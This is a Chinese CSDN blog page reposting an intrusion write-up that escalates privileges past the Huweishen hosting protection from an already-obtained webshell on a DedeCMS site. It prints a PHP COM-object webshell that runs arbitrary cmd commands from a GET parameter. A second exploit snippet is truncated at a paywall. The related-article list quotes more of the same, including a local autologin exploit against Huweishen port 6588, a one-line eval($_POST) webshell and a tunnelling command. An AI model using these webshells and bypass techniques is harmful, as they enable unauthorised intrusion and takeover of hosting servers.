护卫神mysql提权_【转载】提权纪实-突破护卫神目录权限

最新推荐文章于 2023-04-26 22:13:01 发布
最新推荐文章于 2023-04-26 22:13:01 发布
阅读量402 收藏
点赞数
文章标签: 护卫神mysql提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39582656/article/details/114018571
版权
本文详细记录了一次针对护卫神安全软件的提权过程。在MySQL低权限环境下,由于禁止了多种函数,作者通过尝试COM组件、探测服务器支持的文件类型、上传并执行aspx马,最终利用WinRAR的unrar.exe在Windows系统中成功执行命令,实现了目录权限的突破。
摘要由CSDN通过智能技术生成

一个dede的站shell,看了下 disable_functions

exec,system,passthru,popen,pclose,shell_exec,proc_open,dl,chmod,escapeshellarg,escapeshellcmd,sh2_exec,proc_terminate,proc_close

而且也不支持pcntl_exec函数,MySQL低权限用户,尝试COM组件<?php

$command=$_GET['a'];

$wsh = new COM('Shell.Application'); //WScript.Shell

$exec = $wsh->exec("cmd /c ".$command);

$stdout = $exec->StdOut();

$stroutput = $stdout->ReadAll();

echo $stroutput;

?>

无回显,COM组件的WScript.Shell、Shell.Application也不支持,这条路无路可走。

只能另辟蹊径 。

143329b9c24ba84d1199b1dbe0eaea54.png

通过路径名称发现是护卫神,并确定6588端口是护卫神999端口是phpmyadmin 对root试了几个弱口令也没戏<?php

function httpGet() {

$url = '

最低0.47元/天 解锁文章
weixin_39582656
关注
云主机搭建php+mysql运行环境教程(护卫 PHP套件)
09-10
本教程将详细介绍如何在云主机上利用护卫PHP套件搭建PHP和MySQL的运行环境,这对于那些想要快速搭建Web服务而又不想花费大量时间手动配置的人来说非常实用。 首先,我们需要了解云主机的基础知识。云主机是一种...
护卫mysql提权_护卫主机大师被提权漏洞利用(可千万不能乱装护卫主机大师安装的软件)...
weixin_30113575的博客
02-12 420
原标题:护卫主机大师被提权漏洞利用(可千万不能乱装护卫主机大师安装的软件)“护卫·主机大师支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin),并可在线开设主机、SQL Server和MySQL;Web方式管理,拥有独立前台和后台面板。支持Windows Server 2008/2012。结合护卫14年安全防护经...
护卫6588端口提权
https://www.cnblogs.com/zpchcbd/
04-06 1590
利用条件: 1.有shell 2.有可执行脚本 <?php function httpGet() { $url = 'http://127.0.0.1:6588/admin/index.asp?f=autologin'; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($c...
护卫6588端口提权漏洞复现
weixin_30580341的博客
04-19 805
<?php function httpGet() { $url = 'http://127.0.0.1:6588/admin/index.asp?f=autologin'; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER...
护卫mysql提权_护卫主机大师提权漏洞利用分析
weixin_32534653的博客
01-27 393
*本文原创作者:Freedom,本文属FreeBuf原创奖励计划,未经许可禁止转载0x01 前言护卫·主机大师支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin),并可在线开设主机、SQL Server和MySQL;Web方式管理,拥有独立前台和后台面板。支持Windows Server 2008/2012。结合护卫...
护卫主机大师被提权漏洞利用(可千万不能乱装护卫主机管理一键安装的软件)
热门推荐
网站安全专家
06-16 1万+
 “护卫·主机大师支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin),并可在线开设主机、SQL Server和MySQL;Web方式管理,拥有独立前台和后台面板。支持Windows Server 2008/2012。结合护卫14年安全防护经验,严格限制每个站点独立权限,彻底阻挡跨站入侵。”这话说的有点绝对性,做安全...
护卫PHP+MYSQL+IIS
03-15
"护卫PHP+MYSQL+IIS"是一款专为简化PHP、MySQL和IIS集成环境部署而设计的工具,尤其适合那些对服务器配置不熟悉或希望快速搭建开发环境的用户。这款软件通过一键式安装,极大地降低了配置过程的复杂度,让用户能够...
一句话的艺术-web提权.pdf
01-25
当今,针对Web端的文件代码检测软件广泛使用,例如阿D保护盾、安全狗、护卫、360网站卫士等,它们提供了多种功能,包括SQL注入检测、XSS攻击防护、危险代码文件检查、数据库权限管理、流量监控、日志管理、系统...
护卫 主机管理系统使用说明(用户前台设置)
09-30
护卫·主机管理系统该版本支持在Windows Server 2003/2008/2012,含32位和64位,直接开设配置WEB站、FTP站,以及SQL Server和MySQL,是您开设和管理虚拟主机的绝好帮手。但是对于新用户可能在使用上有一些困难,...
护卫·PHP套件 PHP5.6.9 FastCGI版
11-27
护卫PHP套件FastCGI版PHP,自动安装配置PHP+MySQL+PhpMyAdmin等Web环境的软件,完全。 护卫PHP套件FastCGI版PHP安装内容如下: PHP 5.6.9(FastCGI模式) MySQL 5.6.14(MyISAM模式) MyODBC 5.2.6 Php
一次艰难的渗透纪实
04-16
作者: kyo327 EMail: humour327@163.com QQ: 10952989 日期: 2012-01-12 [ 目录 ] 0×00 前言 0×01 初期的探索 0×02 看到一点希望 0×03 从二级域名入手 0×04 调试php溢出漏洞 0×05 杀个回马枪 0×06 不成功的社工 0×07 V5的迂回战术 0×08 从再读cms源代码到后台getshell 0×09 asp登陆口嗅探变态的密码 0×0a 突破星外+护卫 0×0b php嗅探目标管理员密码 0×0c discuz!提示问题的阻碍 0×0d OllyDBG调试superdic并制作注册机 0×0e discuz!提示问题也是浮云,碰撞V5 0×0f 后记
鸡肋提权之变态root利用
weixin_30871701的博客
01-23 164
你急有毛用,我电脑没带,怎么搞? 联系了基友adminlm牛看看吧,他说有防护软件啥的,有root,无法UDF,于是我让他去Mof,经历一番周折,知道了,对mof目录也锁定了权限,无法用root导出mof文件到目录。。。卧槽, 由于我无法电脑操作,我又给他提供了一些思路,php无法调用ws组建,试试asp,后来听火龙瘠薄说整个服务器全都是...
Bypass 护卫SQL注入防御(多姿势)
06-05 1598
0x00 前言​   护卫一直专注服务器安全领域, 其中有一款产品,护卫·入侵防护系统 ,提供了一些网站安全防护的功能,在IIS加固模块中有一个SQL防注入功能。这边主要分享一下几种思路,Bypass 护卫SQL注入防御。0x01 环境搭建护卫官网:http://www.huweishen.com软件版本:护卫·入侵防护系统 V3.8.1 最新版本下载地址:http://down.huw...
护卫mysql提权_护卫主机大师被提权漏洞利用(可千万不能乱装护卫主机管理一键安装的软件)...
weixin_35691715的博客
02-12 318
护卫·主机大师支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin),并可在线开设主机、SQL Server和MySQL;Web方式管理,拥有独立前台和后台面板。支持Windows Server 2008/2012。结合护卫14年安全防护经验,严格限制每个站点独立权限,彻底阻挡跨站入侵。”这话说的有点绝对性,做安全是...
护卫的一些方法
weixin_34183910的博客
06-03 355
一、马儿篇,都是以前可以过护卫的马 二、注入篇,可以绕过注入的方法 三、规则篇,根据护卫的过滤规则大家可以自己设计马儿 一、马儿篇 ----------------1号-------------------------- <?php @eval ($_POST['1']);?> ----------------2号-------------...
艰难提权某黄色网站服务器
aiquan9342的博客
10-30 6862
手提liu百多个黄色网站De服务器。 #继昨晚之后再一次提下一个08r2服务器,这次实属不易从下午一两点到方才现在约晚上十一点,学到新姿势了,心情还是很不错的。故事是这样的,六点多钟睡觉的我,到了九点钟,还是翻来覆去想日站。行吧,起床!日站走起。 逼装完了,说过程吧。拿shell其实才是技术活,但并非我拿下的,是一个404团队的朋友。 依旧第一部是收集信息; 》》》330...
护卫 php 文件权限,文件保护设置_护卫
weixin_34394265的博客
03-21 392
安装了【护卫·防篡改系统】专业版之后,进入左侧【文件保护】:一、主要功能1、采用底层驱动的方式,保护指定路径下的文件不被篡改;2、允许设置路径的多种权限,如读取、新建、修改、删除、执行等;3、允许设置例外的子路径,如 cache、bin等特殊目录,满足多种需求;4、允许设置进程和程序池组合,满足多种需求;5、允许设置多条任务,各任务之间有优先级选择,满足多种需求。二、文件保护部分1、文件保护开关...
护卫设置public目录(IIS下TP5如何设置运行目录
郭然的程序人生
11-22 1837
护卫设置public目录 最近有人问小编,护卫主机系统或者IIS配置PHP的时候,public设置为对外公开目录这个问题百度无法搜索到真实解决办法,那么我们应该如何将运行目录设置为/public呢? 当我们使用护卫主机系统配置Thinkphp的时候,发现Thinkphp的运行目录public在护卫里无法设置为运行目录护卫创建的网站默认根目录为web里面的内容。银天科技小编经过大量的...
迅睿CMS漏洞思考
最新发布
qq_82303224_的博客
04-26 3446
python neoreg.py -k pass@123 -u http://www.abcd.com/cache/temp/linkage/import-file-1-2/cc/cc/tunnel.php (本机执行)其实:网站后台登录会记录内容写缓存到php文件,文件路径为:/cache/log/202206/04.php(按照年月/日期)闭合了但是被转义了,没能getshell,默认地址和扫目录没发现后台地址但发现个/houtai/的目录路径 就是没去试/houtai.php。
Web提权技巧:一句话木马的免杀艺术
随着网络安全意识的增强,许多服务器现在都会安装像阿D保护盾、安全狗、护卫、360网站卫士等安全软件,这些软件提供了多种功能,包括防止SQL注入、XSS攻击、检测危险代码文件、管理数据库权限、监控网站流量、管理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值